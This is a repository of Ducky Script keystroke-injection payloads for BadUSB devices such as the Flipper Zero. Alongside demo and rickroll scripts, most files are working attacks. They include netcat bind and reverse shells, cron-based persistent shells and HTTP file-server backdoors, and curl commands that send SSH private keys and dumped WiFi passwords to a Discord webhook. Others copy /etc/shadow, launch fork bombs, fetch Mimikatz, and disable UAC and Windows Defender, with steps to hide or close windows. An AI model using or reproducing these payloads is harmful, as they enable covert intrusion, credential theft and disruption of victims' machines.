├── README.md ├── linux ├── bindshell.txt ├── demo.txt ├── forkbomb.txt ├── id-rsa_discord.txt ├── persistent_bindshell.txt ├── persistent_http2.txt ├── persistent_http3.txt ├── persistent_revshell.txt ├── revshell.txt ├── rickroll.txt └── wifi_discord.txt ├── macos_demo.txt ├── test_linux_dumpcreds.txt ├── test_macos_forkbomb.txt ├── test_macos_rickroll.txt ├── test_windows_dumpcreds.txt ├── test_windows_forkbomb.txt └── windows ├── demo.txt ├── disable_UAC.txt ├── disable_defender.txt └── rickroll.txt /README.md: -------------------------------------------------------------------------------- 1 | # Ducky Script Payloads 2 | This is a collection of scripts that I have written in Ducky Script to be used in bad USBs. 3 | 4 | ## How is this organised? 5 | Currently scripts are sorted by the target platform, so scripts to work on Windows computers are in the windows dir, Linux in the linux dir, etc. 6 | 7 | ## What do these do? 8 | It depends on the script. I have tried to give these self-explanatory names, but there is also comments in the code to explain what each script does and what it's doing. 9 | 10 | ## How can I use these? 11 | These scripts can be used on either the [USB Rubber Ducky](https://hak5.org/products/usb-rubber-ducky) or the [Flipper Zero](https://flipperzero.one/). For more detailed documentation, refer to the docs of each of these products. I will warn you that this repo was created with the Flipper Zero in mind (personally I just have this folder in my /badusb/ folder of the flipper - I think the folder structure is good for organisation) but it should work when compiled for the Ducky. 12 | 13 | ## How can I get help? 14 | If any help is needed, feel free to either open up an issue or reach out to me on [Twitter](https://twitter.com/UndedInside) 15 | -------------------------------------------------------------------------------- /linux/bindshell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Netcat Bind Shell 2 | REM Author: UndedInside 3 | REM Description: Start a bind shell 4 | 5 | REM Open new terminal window 6 | DEFAULT_DELAY 400 7 | ALT t 8 | DELAY 1000 9 | 10 | REM Start bind shell 11 | REM The port can be changed if required 12 | STRINGLN nc -l -p 1234 -e /bin/bash 13 | 14 | REM Minimise window to run stealthily 15 | ALT F9 16 | -------------------------------------------------------------------------------- /linux/demo.txt: -------------------------------------------------------------------------------- 1 | REM This is BadUSB demo script for linux 2 | 3 | REM Open terminal window 4 | DELAY 1000 5 | ALT T 6 | DELAY 1000 7 | STRING cd ~ 8 | ENTER 9 | DELAY 500 10 | STRING nano flipperzero.txt 11 | ENTER 12 | 13 | STRING Hello World! 14 | ENTER 15 | 16 | DEFAULT_DELAY 50 17 | 18 | STRING = 19 | REPEAT 59 20 | ENTER 21 | ENTER 22 | 23 | STRING _.-------.._ -, 24 | ENTER 25 | HOME 26 | STRING .-"```"--..,,_/ /`-, -, \ 27 | ENTER 28 | HOME 29 | STRING .:" /:/ /'\ \ ,_..., `. | | 30 | ENTER 31 | HOME 32 | STRING / ,----/:/ /`\ _\~`_-"` _; 33 | ENTER 34 | HOME 35 | STRING ' / /`"""'\ \ \.~`_-' ,-"'/ 36 | ENTER 37 | HOME 38 | STRING | | | 0 | | .-' ,/` / 39 | ENTER 40 | HOME 41 | STRING | ,..\ \ ,.-"` ,/` / 42 | ENTER 43 | HOME 44 | STRING ; : `/`""\` ,/--==,/-----, 45 | ENTER 46 | HOME 47 | STRING | `-...| -.___-Z:_______J...---; 48 | ENTER 49 | HOME 50 | STRING : ` _-' 51 | ENTER 52 | HOME 53 | STRING _L_ _ ___ ___ ___ ___ ____--"` 54 | ENTER 55 | HOME 56 | STRING | __|| | |_ _|| _ \| _ \| __|| _ \ 57 | ENTER 58 | HOME 59 | STRING | _| | |__ | | | _/| _/| _| | / 60 | ENTER 61 | HOME 62 | STRING |_| |____||___||_| |_| |___||_|_\ 63 | ENTER 64 | HOME 65 | ENTER 66 | 67 | STRING Flipper Zero BadUSB feature is compatible with USB Rubber Ducky script format 68 | ENTER 69 | STRING More information about script syntax can be found here: 70 | ENTER 71 | STRING https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript 72 | ENTER 73 | 74 | CONTROL X 75 | STRING y 76 | ENTER 77 | 78 | DELAY 500 79 | STRING cat flipperzero.txt 80 | ENTER 81 | -------------------------------------------------------------------------------- /linux/forkbomb.txt: -------------------------------------------------------------------------------- 1 | REM Title: Fork Bomb 2 | REM Author: UndedInside 3 | REM Description: Function that recursively runs itself, consuming resources 4 | REM This (probably) doesn't do any lasting damage. Should be fine after reboot. 5 | 6 | REM Open terminal 7 | DEFAULT_DELAY 700 8 | ALT T 9 | 10 | REM: Create/run forkbomb 11 | STRINGLN :(){ :|:& };: 12 | -------------------------------------------------------------------------------- /linux/id-rsa_discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: ID-RSA Discord Exfil 2 | REM Author: UndedInside 3 | REM Description: Exfils id-rsa over Discord 4 | 5 | REM Open terminal: 6 | DEFAULT_DELAY 400 7 | ALT t 8 | DELAY 500 9 | STRINGLN cd ~/.ssh 10 | 11 | REM Enumerate info and exfil private SSH key 12 | STRINGLN info=`whoami`@`hostname` 13 | STRINGLN curl -F 'payload_json={"username": "'"$info"'", "content": "SSH Key:"}' -F "file1=@id_rsa" "[WEBHOOK URL]" 14 | 15 | REM Cleanup: 16 | DELAY 500 17 | ALT F4 18 | -------------------------------------------------------------------------------- /linux/persistent_bindshell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Persistent Bind Shell 2 | REM Author: UndedInside 3 | REM Description: Creates a cronjob that starts a bind shell 4 | 5 | REM Open terminal 6 | DEFAULT_DELAY 700 7 | ALT t 8 | 9 | REM Create cronjob to start listening on port 1234 10 | REM The attacker IP will need to be set below 11 | STRINGLN echo "* * * * * nc -l -p 1234 -e /bin/bash" > cron 12 | STRINGLN crontab -i cron 13 | 14 | REM Since the job has now been started we can close the window 15 | STRINGLN rm cron 16 | ALT F4 17 | -------------------------------------------------------------------------------- /linux/persistent_http2.txt: -------------------------------------------------------------------------------- 1 | REM Title: Persistent HTTP Backdoor (Python2) 2 | REM Author: UndedInside 3 | REM Description: Hosts the victim's filetree on an HTTP server using the builtin Python2 module 4 | 5 | REM Open new terminal window 6 | DEFAULT_DELAY 400 7 | ALT t 8 | 9 | REM Create backdoor 10 | STRINGLN echo "* * * * * cd ~ && python2 -m SimpleHTTPServer 8000" > cron 11 | STRINGLN crontab -i cron 12 | 13 | REM Clean up 14 | STRINGLN rm cron 15 | ALT F4 16 | 17 | REM You can now interact with this by navigating to http://[Victim IP]:8000 in a browser 18 | REM or curl [Victim IP]:8000 19 | -------------------------------------------------------------------------------- /linux/persistent_http3.txt: -------------------------------------------------------------------------------- 1 | REM Title: Persistent HTTP Backdoor (Python3) 2 | REM Author: UndedInside 3 | REM Description: Hosts the victim's filetree on an HTTP server using the builtin Python3 module 4 | 5 | REM Open new terminal window 6 | DEFAULT_DELAY 400 7 | ALT t 8 | 9 | REM Create backdoor 10 | STRINGLN echo "* * * * * cd ~ && python3 -m http.server 8080" > cron 11 | STRINGLN crontab -i cron 12 | 13 | REM Clean up 14 | STRINGLN rm cron 15 | REM ALT F4 16 | 17 | REM You can now interact with this by navigating to http://[Victim IP]:8080 in a browser 18 | REM or curl [Victim IP]:8080 19 | -------------------------------------------------------------------------------- /linux/persistent_revshell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Persistent Reverse Shell 2 | REM Author: UndedInside 3 | REM Description: Creates a cronjob that starts a reverse shell 4 | 5 | REM Open terminal 6 | DEFAULT_DELAY 700 7 | ALT t 8 | 9 | REM Create cronjob to connect to attacker on port 1234 10 | REM The attacker IP will need to be set below 11 | STRINGLN echo "* * * * * /bin/bash -c 'bash -i>& /dev/tcp/[IP]/1234 0>&1'" > cron 12 | STRINGLN crontab -i cron 13 | 14 | REM Since the job has been created, we can close the window 15 | ALT F4 16 | -------------------------------------------------------------------------------- /linux/revshell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Netcat Reverse Shell 2 | REM Author: UndedInside 3 | REM Description: Opens a reverse shell to the attackers IP 4 | 5 | REM Open terminal window 6 | DEFAULT_DELAY 400 7 | ALT t 8 | DELAY 1000 9 | 10 | REM Start reverse shell 11 | REM [IP] will need to be replaced with attacker IP 12 | STRINGLN nc [IP] 1234 -e /bin/bash 13 | 14 | REM Minimise window to run stealthily 15 | ALT F9 16 | -------------------------------------------------------------------------------- /linux/rickroll.txt: -------------------------------------------------------------------------------- 1 | REM Title: Linux Rickroll 2 | REM Author: UndedInside 3 | REM Description: The iconic rick roll 4 | REM Uses the 10 hour version for maximum annoyance 5 | 6 | 7 | DEFAULT_DELAY 700 8 | REM Open video: 9 | ALT T 10 | STRINGLN xdg-open https://vimeo.com/375468729 11 | 12 | REM Fullscren video: 13 | DELAY 5000 14 | STRING f 15 | -------------------------------------------------------------------------------- /linux/wifi_discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: WiFi Discord Exfil 2 | REM Author: UndedInside 3 | REM Description: Dumps WiFi creds and sends them via discord webhook 4 | 5 | REM SETUP: 6 | REM In your discord server, open server settings, go to "Integrations > Webhooks" and create a new one 7 | REM Press the 'Copy Webhook URL' button and replace [WEBHOOK] in the below script. 8 | 9 | REM Open terminal: 10 | DEFAULT_DELAY 400 11 | ALT t 12 | DELAY 500 13 | STRINGLN cd /tmp 14 | 15 | REM Dump WiFi creds to file and enumerate hostname: 16 | STRINGLN nmcli device wifi show-password > creds.txt 17 | STRINGLN info=`whoami`@`hostname` 18 | 19 | REM Send file: 20 | STRINGLN curl -F 'payload_json={"username": "'"$info"'", "content": "WiFi creds:"}' -F "file1=@creds.txt" "[WEBHOOK URL]" 21 | DELAY 700 22 | 23 | REM Cleanup: 24 | STRINGLN rm creds.txt 25 | ALT F4 26 | -------------------------------------------------------------------------------- /macos_demo.txt: -------------------------------------------------------------------------------- 1 | ID 1234:5678 Apple:Keyboard 2 | REM You can change these values to VID/PID of original Apple keyboard 3 | REM to bypass Keyboard Setup Assistant 4 | 5 | REM This is BadUSB demo script for macOS 6 | 7 | REM Open terminal window 8 | DELAY 1000 9 | GUI SPACE 10 | DELAY 500 11 | STRING terminal 12 | DELAY 500 13 | ENTER 14 | DELAY 750 15 | 16 | REM Copy-Paste previous string 17 | UP 18 | CTRL c 19 | 20 | REM Bigger shell script example 21 | STRING cat > /dev/null << EOF 22 | ENTER 23 | 24 | STRING Hello World! 25 | ENTER 26 | 27 | DEFAULT_DELAY 50 28 | 29 | STRING = 30 | REPEAT 59 31 | ENTER 32 | ENTER 33 | 34 | STRING _.-------.._ -, 35 | ENTER 36 | HOME 37 | STRING .-"```"--..,,_/ /`-, -, \ 38 | ENTER 39 | HOME 40 | STRING .:" /:/ /'\ \ ,_..., `. | | 41 | ENTER 42 | HOME 43 | STRING / ,----/:/ /`\ _\~`_-"` _; 44 | ENTER 45 | HOME 46 | STRING ' / /`"""'\ \ \.~`_-' ,-"'/ 47 | ENTER 48 | HOME 49 | STRING | | | 0 | | .-' ,/` / 50 | ENTER 51 | HOME 52 | STRING | ,..\ \ ,.-"` ,/` / 53 | ENTER 54 | HOME 55 | STRING ; : `/`""\` ,/--==,/-----, 56 | ENTER 57 | HOME 58 | STRING | `-...| -.___-Z:_______J...---; 59 | ENTER 60 | HOME 61 | STRING : ` _-' 62 | ENTER 63 | HOME 64 | STRING _L_ _ ___ ___ ___ ___ ____--"` 65 | ENTER 66 | HOME 67 | STRING | __|| | |_ _|| _ \| _ \| __|| _ \ 68 | ENTER 69 | HOME 70 | STRING | _| | |__ | | | _/| _/| _| | / 71 | ENTER 72 | HOME 73 | STRING |_| |____||___||_| |_| |___||_|_\ 74 | ENTER 75 | HOME 76 | ENTER 77 | 78 | STRING Flipper Zero BadUSB feature is compatible with USB Rubber Ducky script format 79 | ENTER 80 | STRING More information about script syntax can be found here: 81 | ENTER 82 | STRING https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript 83 | ENTER 84 | 85 | STRING EOF 86 | ENTER 87 | -------------------------------------------------------------------------------- /test_linux_dumpcreds.txt: -------------------------------------------------------------------------------- 1 | REM Dumps network credentials and exfils them 2 | DEFAULT_DELAy 400 3 | CTRL ALT t 4 | STRING cp /etc/shadow /tmp/creds.txt 5 | REM To Do: Exfil creds 6 | REM - AWS instance 7 | REM - DropBox 8 | REM - Email 9 | REM - IRC -------------------------------------------------------------------------------- /test_macos_forkbomb.txt: -------------------------------------------------------------------------------- 1 | REM Forkbomb to crash MacOS machines 2 | DEFAULT_DELAY 500 3 | GUI SPACE 4 | STRING terminal 5 | ENTER 6 | perl -e "fork while fork" & -------------------------------------------------------------------------------- /test_macos_rickroll.txt: -------------------------------------------------------------------------------- 1 | REM The classic rick roll 2 | DEFAULT_DELAY 500 3 | REM Open video: 4 | GUI SPACE 5 | STRING terminal 6 | ENTER 7 | STRING open https://vimeo.com/375468729 8 | ENTER 9 | DELAY 700 10 | STRING f 11 | SPACE -------------------------------------------------------------------------------- /test_windows_dumpcreds.txt: -------------------------------------------------------------------------------- 1 | REM Dumps Windows credentials via MimiKatz 2 | DEFAULT_DELAY 400 3 | REM Open powershell 4 | CTRL ESC 5 | STRING powershell 6 | ENTER 7 | REM Download MimiKatz (using ULC to test) 8 | STRING Invoke-WebRequest -Uri 'https://github.com/UndedInside/ULC/ulc.cpp -OutFile $env:TEMP 9 | -------------------------------------------------------------------------------- /test_windows_forkbomb.txt: -------------------------------------------------------------------------------- 1 | REM Forkbomb to crash Windows machines 2 | DEFAULT_DELAY 500 3 | CTRL ESC 4 | STRING cmd 5 | ENTER 6 | STRING %0|%0 7 | REM Test this ^ 8 | ENTER -------------------------------------------------------------------------------- /windows/demo.txt: -------------------------------------------------------------------------------- 1 | REM This is BadUSB demo script for windows 2 | 3 | REM Open windows notepad 4 | DELAY 1000 5 | GUI r 6 | DELAY 500 7 | STRING notepad 8 | DELAY 500 9 | ENTER 10 | DELAY 750 11 | 12 | STRING Hello World! 13 | ENTER 14 | DEFAULT_DELAY 50 15 | 16 | REM Copy-Paste previous string 17 | UP 18 | HOME 19 | SHIFT DOWN 20 | CTRL c 21 | RIGHT 22 | CTRL v 23 | CTRL v 24 | 25 | REM Alt code input demo 26 | ALTCHAR 7 27 | ALTSTRING This line was print using Alt+Numpad input method. It works even if non-US keyboard layout is selected 28 | ENTER 29 | 30 | STRING = 31 | REPEAT 59 32 | ENTER 33 | ENTER 34 | 35 | STRING _.-------.._ -, 36 | ENTER 37 | HOME 38 | STRING .-"```"--..,,_/ /`-, -, \ 39 | ENTER 40 | HOME 41 | STRING .:" /:/ /'\ \ ,_..., `. | | 42 | ENTER 43 | HOME 44 | STRING / ,----/:/ /`\ _\~`_-"` _; 45 | ENTER 46 | HOME 47 | STRING ' / /`"""'\ \ \.~`_-' ,-"'/ 48 | ENTER 49 | HOME 50 | STRING | | | 0 | | .-' ,/` / 51 | ENTER 52 | HOME 53 | STRING | ,..\ \ ,.-"` ,/` / 54 | ENTER 55 | HOME 56 | STRING ; : `/`""\` ,/--==,/-----, 57 | ENTER 58 | HOME 59 | STRING | `-...| -.___-Z:_______J...---; 60 | ENTER 61 | HOME 62 | STRING : ` _-' 63 | ENTER 64 | HOME 65 | STRING _L_ _ ___ ___ ___ ___ ____--"` 66 | ENTER 67 | HOME 68 | STRING | __|| | |_ _|| _ \| _ \| __|| _ \ 69 | ENTER 70 | HOME 71 | STRING | _| | |__ | | | _/| _/| _| | / 72 | ENTER 73 | HOME 74 | STRING |_| |____||___||_| |_| |___||_|_\ 75 | ENTER 76 | HOME 77 | ENTER 78 | 79 | STRING Flipper Zero BadUSB feature is compatible with USB Rubber Ducky script format 80 | ENTER 81 | STRING More information about script synax can be found here: 82 | ENTER 83 | STRING https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript 84 | ENTER 85 | -------------------------------------------------------------------------------- /windows/disable_UAC.txt: -------------------------------------------------------------------------------- 1 | REM Disables User Account Control 2 | DEFAULT_DELAY 400 3 | REM Open UAC 4 | CTRL ESC 5 | STRING UAC 6 | ENTER 7 | LEFTARROW 8 | ENTER 9 | REM Disable UAC 10 | TAB 11 | DOWNARROW 12 | DOWNARROW 13 | DOWNARROW 14 | TAB 15 | ENTER 16 | LEFTARROW 17 | ENTER 18 | -------------------------------------------------------------------------------- /windows/disable_defender.txt: -------------------------------------------------------------------------------- 1 | REM Disables Windows Defender 2 | REM Open Defender settings 3 | DEFAULT_DELAY 400 4 | CTRL ESC 5 | STRING defender 6 | ENTER 7 | ENTER 8 | TAB 9 | TAB 10 | TAB 11 | TAB 12 | ENTER 13 | REM Disable protection 14 | SPACE 15 | TAB 16 | TAB 17 | TAB 18 | TAB 19 | SPACE 20 | REM Clean up 21 | ALT F4 22 | -------------------------------------------------------------------------------- /windows/rickroll.txt: -------------------------------------------------------------------------------- 1 | REM The classic rick roll 2 | DEFAULT_DELAY 700 3 | REM Open video: 4 | CTRL ESC 5 | STRING cmd 6 | ENTER 7 | STRING start msedge https://vimeo.com/375468729 8 | ENTER 9 | REM Fullscreen video: 10 | DELAY 1000 11 | STRING f 12 | SPACE 13 | --------------------------------------------------------------------------------